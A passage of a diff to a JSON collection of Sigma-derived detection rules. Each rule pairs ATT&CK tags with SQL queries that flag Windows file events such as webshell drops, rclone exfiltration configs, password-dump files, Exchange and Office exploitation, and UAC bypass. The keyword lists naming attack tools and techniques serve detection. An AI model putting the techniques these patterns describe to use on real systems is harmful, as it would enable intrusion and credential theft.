"attack.execution", - "attack.t1087", - "attack.t1114", - "attack.t1059", - "attack.t1550.002" + "attack.persistence", + "attack.t1547.001", + "cve.2022.30190" ], "falsepositives": [ - "Go utilities that use staaldraad awesome NTLM library" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4776' AND Workstation = 'RULER') OR (EventID IN ('4624', '4625') AND WorkstationName = 'RULER')))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\'))" ], - "filename": "win_security_alert_ruler.yml" + "filename": "file_event_win_msdt_susp_directories.yml" }, { - "title": "SMB Create Remote File Admin Share", - "id": "b210394c-ba12-4f89-9117-44a2464b9511", + "title": "Windows Webshell Creation", + "id": "39f1f9f2-9636-45de-98f6-a4046aa8e4b9", "status": "test", - "description": "Look for non-system accounts SMB accessing a file with write (0x2) access mask via administrative share (i.e C$).", - "author": "Jose Rodriguez (@Cyb3rPandaH), OTR (Open Threat Research)", + "description": "Possible webshell file creation on a static web site", + "author": "Beyu Denis, oscd.community, Tim Shelton", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.persistence", + "attack.t1505.003" ], "falsepositives": [ - "Unknown" + "Legitimate administrator or developer creating legitimate executable files in a web application folder" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND ShareName LIKE '%C$' ESCAPE '\\' AND AccessMask = '0x2') AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (((TargetFilename LIKE '%\\\\inetpub\\\\wwwroot\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.asp%' ESCAPE '\\' OR TargetFilename LIKE '%.ashx%' ESCAPE '\\' OR TargetFilename LIKE '%.ph%' ESCAPE '\\')) OR ((TargetFilename LIKE '%\\\\www\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\htdocs\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\html\\\\%' ESCAPE '\\') AND TargetFilename LIKE '%.ph%' ESCAPE '\\')) AND NOT (((TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')) OR (NewProcessName = 'System') OR (TargetFilename LIKE '%\\\\xampp%' ESCAPE '\\')))" ], - "filename": "win_security_smb_file_creation_admin_shares.yml" + "filename": "file_event_win_webshell_creation_detect.yml" }, { - "title": "NetNTLM Downgrade Attack", - "id": "d3abac66-f11c-4ed0-8acb-50cc29c97eed", + "title": "Rclone Config File Creation", + "id": "34986307-b7f4-49be-92f3-e7a4d01ac5db", "status": "test", - "description": "Detects NetNTLM downgrade attack", - "author": "Florian Roth (Nextron Systems), wagga", + "description": "Detects Rclone config file being created", + "author": "Aaron Greetham (@beardofbinary) - NCC Group", "tags": [ - "attack.defense_evasion", - "attack.t1562.001", - "attack.t1112" + "attack.exfiltration", + "attack.t1567.002" ], "falsepositives": [ - "Unknown" + "Legitimate Rclone usage (rare)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4657' AND ObjectName LIKE '%\\\\REGISTRY\\\\MACHINE\\\\SYSTEM%' ESCAPE '\\' AND ObjectName LIKE '%ControlSet%' ESCAPE '\\' AND ObjectName LIKE '%\\\\Control\\\\Lsa%' ESCAPE '\\' AND ObjectValueName IN ('LmCompatibilityLevel', 'NtlmMinClientSec', 'RestrictSendingNTLMTraffic'))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\.config\\\\rclone\\\\%' ESCAPE '\\')" ], - "filename": "win_security_net_ntlm_downgrade.yml" + "filename": "file_event_win_rclone_exec_file.yml" }, { - "title": "Active Directory Replication from Non Machine Account", - "id": "17d619c1-e020-4347-957e-1d1207455c93", + "title": "Wmiprvse Wbemcomn DLL Hijack - File", + "id": "614a7e17-5643-4d89-b6fe-f9df1a79641c", "status": "test", - "description": "Detects potential abuse of Active Directory Replication Service (ADRS) from a non machine account to request credentials.", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network and loading it for a WMI DLL Hijack scenario.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.credential_access", - "attack.t1003.006" + "attack.execution", + "attack.t1047", + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4662' AND AccessMask = '0x100' AND (Properties LIKE '%1131f6aa-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR Properties LIKE '%1131f6ad-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR Properties LIKE '%89e95b76-444d-4c62-991a-0facbeda640c%' ESCAPE '\\')) AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\' OR SubjectUserName LIKE 'MSOL\\_%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (NewProcessName = 'System' AND TargetFilename LIKE '%\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\')" ], - "filename": "win_security_ad_replication_non_machine_account.yml" + "filename": "file_event_win_wmiprvse_wbemcomn_dll_hijack.yml" }, { - "title": "Invoke-Obfuscation Via Use Rundll32 - Security", - "id": "cd0f7229-d16f-42de-8fe3-fba365fbcb3a", + "title": "Suspicious Word Cab File Write CVE-2021-40444", + "id": "60c0a111-787a-4e8a-9262-ee485f3ef9d5", "status": "experimental", - "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects file creation patterns noticeable during the exploitation of CVE-2021-40444", + "author": "Florian Roth (Nextron Systems), Sittikorn S", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.resource_development", + "attack.t1587" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%&&%' ESCAPE '\\' AND ServiceFileName LIKE '%rundll32%' ESCAPE '\\' AND ServiceFileName LIKE '%shell32.dll%' ESCAPE '\\' AND ServiceFileName LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND (ServiceFileName LIKE '%value%' ESCAPE '\\' OR ServiceFileName LIKE '%invoke%' ESCAPE '\\' OR ServiceFileName LIKE '%comspec%' ESCAPE '\\' OR ServiceFileName LIKE '%iex%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' AND TargetFilename LIKE '%.cab' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Windows\\\\INetCache%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.inf%' ESCAPE '\\')) AND NOT (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%AppData\\\\Local\\\\Temp%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Content.inf' ESCAPE '\\'))" ], - "filename": "win_security_invoke_obfuscation_via_use_rundll32_services_security.yml" + "filename": "file_event_win_winword_cve_2021_40444.yml" }, { - "title": "WCE wceaux.dll Access", - "id": "1de68c67-af5c-4097-9c85-fe5578e09e67", + "title": "Hijack Legit RDP Session to Move Laterally", + "id": "52753ea4-b3a0-4365-910d-36cff487b789", "status": "test", - "description": "Detects wceaux.dll access while WCE pass-the-hash remote command execution on source host", - "author": "Thomas Patzke", + "description": "Detects the usage of tsclient share to place a backdoor on the RDP source machine's startup folder", + "author": "Samir Bousseaden", "tags": [ - "attack.credential_access", - "attack.t1003", - "attack.s0005" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4656', '4658', '4660', '4663') AND ObjectName LIKE '%\\\\wceaux.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\mstsc.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\')" ], - "filename": "win_security_mal_wceaux_dll.yml" + "filename": "file_event_win_tsclient_filewrite_startup.yml" }, { - "title": "HybridConnectionManager Service Installation", - "id": "0ee4d8a5-4e67-4faf-acfa-62a78457d1f2", - "status": "test", - "description": "Rule to detect the Hybrid Connection Manager service installation.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Created Files by Office Applications", + "id": "c7a74c80-ba5a-486e-9974-ab9e682bc5e4", + "status": "experimental", + "description": "This rule will monitor executable and script file creation by office applications. Please add more file extensions or magic bytes to the logic of your choice.", + "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)", "tags": [ - "attack.persistence", - "attack.t1554" + "attack.t1204.002", + "attack.execution" ], "falsepositives": [ - "Legitimate use of Hybrid Connection Manager via Azure function apps." + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceName = 'HybridConnectionManager' AND ServiceFileName LIKE '%HybridConnectionManager%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.ocx' ESCAPE '\\' OR TargetFilename LIKE '%.com' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.sys' ESCAPE '\\' OR TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.scr' ESCAPE '\\' OR TargetFilename LIKE '%.proj' ESCAPE '\\')) AND NOT ((TargetFilename LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\WebServiceCache\\\\AllUsers%' ESCAPE '\\' AND TargetFilename LIKE '%.com' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\webexdelta\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\')) OR (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\assembly\\\\tmp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.dll' ESCAPE '\\')))" ], - "filename": "win_security_hybridconnectionmgr_svc_installation.yml" + "filename": "file_event_win_script_creation_by_office_using_file_ext.yml" }, { - "title": "Possible Shadow Credentials Added", - "id": "f598ea0c-c25a-4f72-a219-50c44411c791", + "title": "Office Macro File Creation From Suspicious Process", + "id": "b1c50487-1967-4315-a026-6491686d860e", "status": "experimental", - "description": "Detects possible addition of shadow credentials to an active directory object.", - "author": "Nasreddine Bencherchali (Nextron Systems), Elastic (idea)", + "description": "Detects the creation of a office macro file from a a suspicious process", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1556" + "attack.initial_access", + "attack.t1566.001" ], "falsepositives": [ - "Modifications in the msDS-KeyCredentialLink attribute can be done legitimately by the Azure AD Connect synchronization account or the ADFS service account. These accounts can be added as Exceptions. (From elastic FP section)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5136' AND AttributeLDAPDisplayName = 'msDS-KeyCredentialLink')" + "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\')) AND (TargetFilename LIKE '%.docm' ESCAPE '\\' OR TargetFilename LIKE '%.dotm' ESCAPE '\\' OR TargetFilename LIKE '%.xlsm' ESCAPE '\\' OR TargetFilename LIKE '%.xltm' ESCAPE '\\' OR TargetFilename LIKE '%.potm' ESCAPE '\\' OR TargetFilename LIKE '%.pptm' ESCAPE '\\'))" ], - "filename": "win_security_susp_possible_shadow_credentials_added.yml" + "filename": "file_event_win_office_macro_files_from_susp_process.yml" }, { - "title": "Password Change on Directory Service Restore Mode (DSRM) Account", - "id": "53ad8e36-f573-46bf-97e4-15ba5bf4bb51", - "status": "stable", - "description": "The Directory Service Restore Mode (DSRM) account is a local administrator account on Domain Controllers. Attackers may change the password to gain persistence.", - "author": "Thomas Patzke", + "title": "Suspicious DotNET CLR Usage Log Artifact", + "id": "e0b06658-7d1d-4cd3-bf15-03467507ff7c", + "status": "experimental", + "description": "Detects the creation of Usage Log files by the CLR (clr.dll). These files are named after the executing process once the assembly is finished executing for the first time in the (user) session context.", + "author": "frack113, omkar72, oscd.community, Wojciech Lesicki", "tags": [ - "attack.persistence", - "attack.t1098" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Initial installation of a domain controller" + "Rundll32.exe with zzzzInvokeManagedCustomActionOutOfProc in command line and msiexec.exe as parent process - https://twitter.com/SBousseaden/status/1388064061087260675" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4794')" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\UsageLogs\\\\cmstp.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\cscript.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\mshta.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\msxsl.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\regsvr32.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\rundll32.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\svchost.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\wscript.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\wmic.exe.log' ESCAPE '\\') AND NOT ((ParentProcessName LIKE '%\\\\MsiExec.exe' ESCAPE '\\' AND ParentCommandLine LIKE '% -Embedding%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND CommandLine LIKE '%Temp%' ESCAPE '\\' AND CommandLine LIKE '%zzzzInvokeManagedCustomActionOutOfProc%' ESCAPE '\\')))" ], - "filename": "win_security_susp_dsrm_password_change.yml" + "filename": "file_event_win_net_cli_artefact.yml" }, { - "title": "Sysmon Channel Reference Deletion", - "id": "18beca67-ab3e-4ee3-ba7a-a46ca8d7d0cc", + "title": "QuarksPwDump Dump File", + "id": "847def9e-924d-4e90-b7c4-5f581395a2b4", "status": "test", - "description": "Potential threat actor tampering with Sysmon manifest and eventually disabling it", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects a dump file written by QuarksPwDump password dumper", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.credential_access", + "attack.t1003.002" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4657' AND (ObjectName LIKE '%WINEVT\\\\Publishers\\\\{5770385f-c22a-43e0-bf4c-06f5698ffbd9}%' ESCAPE '\\' OR ObjectName LIKE '%WINEVT\\\\Channels\\\\Microsoft-Windows-Sysmon/Operational%' ESCAPE '\\') AND ObjectValueName = 'Enabled' AND NewValue = '0') OR (EventID = '4663' AND (ObjectName LIKE '%WINEVT\\\\Publishers\\\\{5770385f-c22a-43e0-bf4c-06f5698ffbd9}%' ESCAPE '\\' OR ObjectName LIKE '%WINEVT\\\\Channels\\\\Microsoft-Windows-Sysmon/Operational%' ESCAPE '\\') AND AccessMask = '65536')))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\SAM-%' ESCAPE '\\' AND TargetFilename LIKE '%.dmp%' ESCAPE '\\')" ], - "filename": "win_security_sysmon_channel_reference_deletion.yml" + "filename": "file_event_win_hktl_quarkspw_filedump.yml" }, { - "title": "Operation Wocao Activity - Security", - "id": "74ad4314-482e-4c3e-b237-3f7ed3b9ca8d", + "title": "CVE-2021-26858 Exchange Exploitation", + "id": "b06335b3-55ac-4b41-937e-16b7f5d57dfd", "status": "test", - "description": "Detects activity mentioned in Operation Wocao report", - "author": "Florian Roth (Nextron Systems), frack113", + "description": "Detects possible successful exploitation for vulnerability described in CVE-2021-26858 by looking for \ncreation of non-standard files on disk by Exchange Server’s Unified Messaging service\nwhich could indicate dropping web shells or other malicious content\n", + "author": "Bhabesh Raj", "tags": [ - "attack.discovery", - "attack.t1012", - "attack.defense_evasion", - "attack.t1036.004", - "attack.t1027", + "attack.t1203", "attack.execution", - "attack.t1053.005", - "attack.t1059.001" + "cve.2021.26858" ], "falsepositives": [ - "Administrators that use checkadmin.exe tool to enumerate local administrators" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4799' AND TargetUserName LIKE 'Administr%' ESCAPE '\\' AND CallerProcessName LIKE '%\\\\checkadmin.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%UMWorkerProcess.exe' ESCAPE '\\' AND NOT ((TargetFilename LIKE '%CacheCleanup.bin' ESCAPE '\\' OR TargetFilename LIKE '%.txt' ESCAPE '\\' OR TargetFilename LIKE '%.LOG' ESCAPE '\\' OR TargetFilename LIKE '%.cfg' ESCAPE '\\' OR TargetFilename LIKE '%cleanup.bin' ESCAPE '\\')))" ], - "filename": "win_security_apt_wocao.yml" + "filename": "file_event_win_cve_2021_26858_msexchange.yml" }, { - "title": "Suspicious Scheduled Task Update", - "id": "614cf376-6651-47c4-9dcc-6b9527f749f4", + "title": "PSEXEC Remote Execution File Artefact", + "id": "304afd73-55a5-4bb9-8c21-0b1fc84ea9e4", "status": "experimental", - "description": "Detects update to a scheduled task event that contain suspicious keywords.", + "description": "Detects creation of the PSEXEC key file. Which is created anytime a PsExec command is executed. It gets written to the file system and will be recorded in the USN Journal on the target system", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", + "attack.lateral_movement", "attack.privilege_escalation", + "attack.execution", "attack.persistence", - "attack.t1053.005" + "attack.t1136.002", + "attack.t1543.003", + "attack.t1570", + "attack.s0029" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4702' AND (TaskContentNew LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\WINDOWS\\\\Temp\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR TaskContentNew LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\') AND (TaskContentNew LIKE '%regsvr32%' ESCAPE '\\' OR TaskContentNew LIKE '%rundll32%' ESCAPE '\\' OR TaskContentNew LIKE '%cmd.exe%' ESCAPE '\\' OR TaskContentNew LIKE '%cmd%' ESCAPE '\\' OR TaskContentNew LIKE '%/c %' ESCAPE '\\' OR TaskContentNew LIKE '%/k %' ESCAPE '\\' OR TaskContentNew LIKE '%/r %' ESCAPE '\\' OR TaskContentNew LIKE '%powershell%' ESCAPE '\\' OR TaskContentNew LIKE '%pwsh%' ESCAPE '\\' OR TaskContentNew LIKE '%mshta%' ESCAPE '\\' OR TaskContentNew LIKE '%wscript%' ESCAPE '\\' OR TaskContentNew LIKE '%cscript%' ESCAPE '\\' OR TaskContentNew LIKE '%certutil%' ESCAPE '\\' OR TaskContentNew LIKE '%bitsadmin%' ESCAPE '\\' OR TaskContentNew LIKE '%bash.exe%' ESCAPE '\\' OR TaskContentNew LIKE '%bash %' ESCAPE '\\' OR TaskContentNew LIKE '%scrcons%' ESCAPE '\\' OR TaskContentNew LIKE '%wmic %' ESCAPE '\\' OR TaskContentNew LIKE '%wmic.exe%' ESCAPE '\\' OR TaskContentNew LIKE '%forfiles%' ESCAPE '\\' OR TaskContentNew LIKE '%scriptrunner%' ESCAPE '\\' OR TaskContentNew LIKE '%hh.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Windows\\\\PSEXEC-%' ESCAPE '\\' AND TargetFilename LIKE '%.key' ESCAPE '\\')" ], - "filename": "win_security_susp_scheduled_task_update.yml" + "filename": "file_event_win_psexec_service_key.yml" }, { - "title": "KrbRelayUp Attack Pattern", - "id": "749c9f5e-b353-4b90-a9c1-05243357ca4b", + "title": "Suspicious ASPX File Drop by Exchange", + "id": "bd1212e5-78da-431e-95fa-c58e3237a8e6", "status": "experimental", - "description": "Detects logon events that have characteristics of events generated during an attack with KrbRelayUp and the like", - "author": "@SBousseaden, Florian Roth", + "description": "Detects suspicious file type dropped by an Exchange component in IIS into a suspicious folder", + "author": "Florian Roth (Nextron Systems), MSTI (query, idea)", "tags": [ - "attack.privilege_escalation", - "attack.credential_access" + "attack.persistence", + "attack.t1505.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '3' AND AuthenticationPackageName = 'Kerberos' AND IpAddress = '127.0.0.1' AND TargetUserSid LIKE 'S-1-5-21-%' ESCAPE '\\' AND TargetUserSid LIKE '%-500' ESCAPE '\\')" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' AND CommandLine LIKE '%MSExchange%' ESCAPE '\\' AND (TargetFilename LIKE '%FrontEnd\\\\HttpProxy\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\inetpub\\\\wwwroot\\\\aspnet\\_client\\\\%' ESCAPE '\\') AND (TargetFilename LIKE '%.aspx' ESCAPE '\\' OR TargetFilename LIKE '%.asp' ESCAPE '\\' OR TargetFilename LIKE '%.ashx' ESCAPE '\\'))" ], - "filename": "win_security_susp_krbrelayup.yml" + "filename": "file_event_win_exchange_webshell_drop.yml" }, { - "title": "RottenPotato Like Attack Pattern", - "id": "16f5d8ca-44bd-47c8-acbe-6fc95a16c12f", - "status": "test", - "description": "Detects logon events that have characteristics of events generated during an attack with RottenPotato and the like", - "author": "@SBousseaden, Florian Roth", + "title": "Suspicious File Creation In Uncommon AppData Folder", + "id": "d7b50671-d1ad-4871-aa60-5aa5b331fe04", + "status": "experimental", + "description": "Detects the creation of suspicious files and folders inside the user's AppData folder but not inside any of the common and well known directories (Local, Romaing, LocalLow). This method could be used as a method to bypass detection who exclude the AppData folder in fear of FPs", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.credential_access", - "attack.t1557.001" + "attack.defense_evasion", + "attack.execution" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '3' AND TargetUserName = 'ANONYMOUS LOGON' AND WorkstationName = '-' AND IpAddress IN ('127.0.0.1', '::1'))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.cmd' ESCAPE '\\' OR TargetFilename LIKE '%.cpl' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.iso' ESCAPE '\\' OR TargetFilename LIKE '%.lnk' ESCAPE '\\' OR TargetFilename LIKE '%.msi' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.psm1' ESCAPE '\\' OR TargetFilename LIKE '%.scr' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\')) AND NOT (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\LocalLow\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\')))" ], - "filename": "win_security_susp_rottenpotato.yml" + "filename": "file_event_win_new_files_in_uncommon_appdata_folder.yml" }, { - "title": "Windows Defender Exclusion Set", - "id": "e9c8808f-4cfb-4ba9-97d4-e5f3beaa244d", - "status": "test", - "description": "Detects scenarios where an windows defender exclusion was added in registry where an entity would want to bypass antivirus scanning from windows defender", - "author": "@BarryShooshooga", + "title": "Suspicious Executable File Creation", + "id": "74babdd6-a758-4549-9632-26535279e654", + "status": "experimental", + "description": "Detect creation of suspicious executable file name. Some strings look for suspicious file extensions, others look for filenames that exploit unquoted service paths.", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1564" ], "falsepositives": [ - "Intended inclusions by administrator" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4657', '4656', '4660', '4663') AND ObjectName LIKE '%\\\\Microsoft\\\\Windows Defender\\\\Exclusions\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%.bat.exe' ESCAPE '\\' OR TargetFilename LIKE '%.sys.exe' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\$Recycle.Bin.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Documents and Settings.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\MSOCache.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Recovery.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\PerfLogs.exe' ESCAPE '\\'))" ], - "filename": "win_security_defender_bypass.yml" + "filename": "file_event_win_susp_executable_creation.yml" }, { - "title": "Invoke-Obfuscation CLIP+ Launcher - Security", - "id": "4edf51e1-cb83-4e1a-bc39-800e396068e3", - "status": "experimental", - "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "title": "UAC Bypass Using MSConfig Token Modification - File", + "id": "41bb431f-56d8-4691-bb56-ed34e390906f", + "status": "test", + "description": "Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%&&%' ESCAPE '\\' AND ServiceFileName LIKE '%clipboard]::%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\pkgmgr.exe' ESCAPE '\\')" ], - "filename": "win_security_invoke_obfuscation_clip_services_security.yml" + "filename": 